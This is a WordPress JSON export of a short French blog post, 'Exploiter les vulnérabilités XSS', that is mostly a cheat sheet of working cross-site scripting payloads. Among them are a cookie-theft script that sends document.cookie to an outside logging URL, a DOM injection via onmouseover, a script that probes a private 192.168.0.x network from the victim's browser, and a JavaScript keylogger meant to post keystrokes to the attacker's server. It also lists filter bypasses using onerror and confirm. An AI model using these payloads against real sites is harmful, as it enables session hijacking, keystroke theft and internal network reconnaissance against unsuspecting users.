{"id":660,"date":"2021-07-27T18:26:24","date_gmt":"2021-07-27T23:26:24","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=660"},"modified":"2022-04-27T07:46:55","modified_gmt":"2022-04-27T12:46:55","slug":"exploiter-les-vulnerabilites-xss","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/","title":{"rendered":"Exploiter les vuln\u00e9rabilit\u00e9s XSS"},"content":{"rendered":"

V\u00e9rifier si un site est vuln\u00e9rable \u00e0 une faille XSS (r\u00e9flexion). On entre ce code dans une bo\u00eete de recherche. Si rien n’est filtr\u00e9, souvent, dans le r\u00e9sultat de recherche, les termes recherch\u00e9s sont affich\u00e9s.
\n

<script>alert("Hello")<\/script>\n<script>alert(window.location.hostname)<\/script> #alternative\n<\/code><\/pre><\/p>\n
Afficher le cookie du site
\n<script>alert(document.cookie)<\/script><\/code><\/p>\n
Voler un cookie
\n<script>document.location='http:\/\/www.searchevolution.com\/log\/'+document.cookie<\/script> <\/code><\/p>\n
Changer le contenu de la page web
\n
<script>document.querySelector('#thm-title').textContent = 'I am a Hacker'<\/script>\ndocument.getElementById('thm-title').innerHTML="test";<\/code><\/pre><\/p>\n
Xss DOM. Parfois une partie du DOM est modifi\u00e9 et une action est n\u00e9cessaire pour activer notre script. Par exemple, on peut nous demander le nom d’un image et afficher cette nouvelle image sur le site. On pourrait ins\u00e9rer un code de cette fa\u00e7on qui serait ex\u00e9cut\u00e9 lorsque la souris serait au dessus de cette image.
\n\/image.png" onmouseover="alert(document.cookie)<\/code><\/p>\n
V\u00e9rifier si le routeur a un interface web
\n<img src="http:\/\/192.168.0.1\/favicon.ico" onload="alert('Found')" onerror="alert('Not found')"><\/code><\/p>\n
scanner un r\u00e9seau priv\u00e9
\n
\n <script>\n\u2003for (let i = 0; i < 256; i++) {\n\u2003\u2003let ip = '192.168.0.' + i\n\n\u2003\u2003let code = '<img src="http:\/\/' + ip + '\/favicon.ico" onload="this.onerror=null; this.src=\/log\/' + ip + '">'\n\u2003\u2003document.body.innerHTML += code\n\u2003}\n<\/script> \n<\/code><\/pre><\/p>\n
Enregistreur de frappes en javascript (vuln\u00e9rabilit\u00e9 xss)
\n
 <script type="text\/javascript">\n\u2003let l = ""; \/\/ Variable to store key-strokes in\n\u2003document.onkeypress = function (e) { \/\/ Event to listen for key presses\n\u2003\u2003\u2003l += e.key; \/\/ If user types, log it to the l variable\n\u2003\u2003\u2003console.log(l); \/\/ update this line to post to your own server\n\u2003}\n<\/script> <\/code><\/pre><\/p>\n
Exemple pour outrepasser un filtre qui enl\u00e8ve “script”
\n<img src="blah" onerror=alert("Hello") \/><\/code><\/p>\n
Exemple pour outrepasser un filtre qui enl\u00e8ve “alert”
\n<img src="blah" onerror=confirm("Hello") \/><\/code><\/p>\n
BeEF est un outil d’exploitation XSS (vecteurs d’attaques c\u00f4t\u00e9 client)<\/p>\n
Autres ressources<\/strong>
\nXSS-Payloads.com<\/p>\n","protected":false},"excerpt":{"rendered":"
V\u00e9rifier si un site est vuln\u00e9rable \u00e0 une faille XSS (r\u00e9flexion). On entre ce code dans une bo\u00eete de recherche. Si rien n’est filtr\u00e9, souvent, dans le r\u00e9sultat de recherche, les termes recherch\u00e9s sont affich\u00e9s. <script>alert("Hello")<\/script> <script>alert(window.location.hostname)<\/script> #alternative Afficher le cookie du site <script>alert(document.cookie)<\/script> Voler un cookie <script>document.location='http:\/\/www.searchevolution.com\/log\/'+document.cookie<\/script> Changer le contenu de la page web <script>document.querySelector('#thm-title').textContent = 'I am a Hacker'<\/script> document.getElementById('thm-title').innerHTML="test"; Xss DOM. Parfois une partie du DOM est modifi\u00e9 et une action est n\u00e9cessaire pour activer notre script. Par exemple, on peut nous demander le nom d’un image et afficher cette nouvelle image sur le site. On pourrait <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\nExploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"V\u00e9rifier si un site est vuln\u00e9rable \u00e0 une faille XSS (r\u00e9flexion). On entre ce code dans une bo\u00eete de recherche. Si rien n’est filtr\u00e9, souvent, dans le r\u00e9sultat de recherche, les termes recherch\u00e9s sont affich\u00e9s. <script>alert("Hello")<\/script> <script>alert(window.location.hostname)<\/script> #alternative Afficher le cookie du site <script>alert(document.cookie)<\/script> Voler un cookie <script>document.location='http:\/\/www.searchevolution.com\/log\/'+document.cookie<\/script> Changer le contenu de la page web <script>document.querySelector('#thm-title').textContent = 'I am a Hacker'<\/script> document.getElementById('thm-title').innerHTML="test"; Xss DOM. Parfois une partie du DOM est modifi\u00e9 et une action est n\u00e9cessaire pour activer notre script. Par exemple, on peut nous demander le nom d’un image et afficher cette nouvelle image sur le site. On pourrait\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-27T23:26:24+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:46:55+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/192.168.0.1\/favicon.ico\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/\",\"name\":\"Exploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-27T23:26:24+00:00\",\"dateModified\":\"2022-04-27T12:46:55+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploiter les vuln\u00e9rabilit\u00e9s XSS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/","og_locale":"fr_CA","og_type":"article","og_title":"Exploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site","og_description":"V\u00e9rifier si un site est vuln\u00e9rable \u00e0 une faille XSS (r\u00e9flexion). On entre ce code dans une bo\u00eete de recherche. Si rien n’est filtr\u00e9, souvent, dans le r\u00e9sultat de recherche, les termes recherch\u00e9s sont affich\u00e9s. <script>alert("Hello")<\/script> <script>alert(window.location.hostname)<\/script> #alternative Afficher le cookie du site <script>alert(document.cookie)<\/script> Voler un cookie <script>document.location='http:\/\/www.searchevolution.com\/log\/'+document.cookie<\/script> Changer le contenu de la page web <script>document.querySelector('#thm-title').textContent = 'I am a Hacker'<\/script> document.getElementById('thm-title').innerHTML="test"; Xss DOM. Parfois une partie du DOM est modifi\u00e9 et une action est n\u00e9cessaire pour activer notre script. Par exemple, on peut nous demander le nom d’un image et afficher cette nouvelle image sur le site. On pourrait","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-27T23:26:24+00:00","article_modified_time":"2022-04-27T12:46:55+00:00","og_image":[{"url":"http:\/\/192.168.0.1\/favicon.ico"}],"author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/","name":"Exploiter les vuln\u00e9rabilit\u00e9s XSS - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-27T23:26:24+00:00","dateModified":"2022-04-27T12:46:55+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/27\/exploiter-les-vulnerabilites-xss\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Exploiter les vuln\u00e9rabilit\u00e9s XSS"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/660"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=660"}],"version-history":[{"count":5,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/660\/revisions"}],"predecessor-version":[{"id":1106,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/660\/revisions\/1106"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}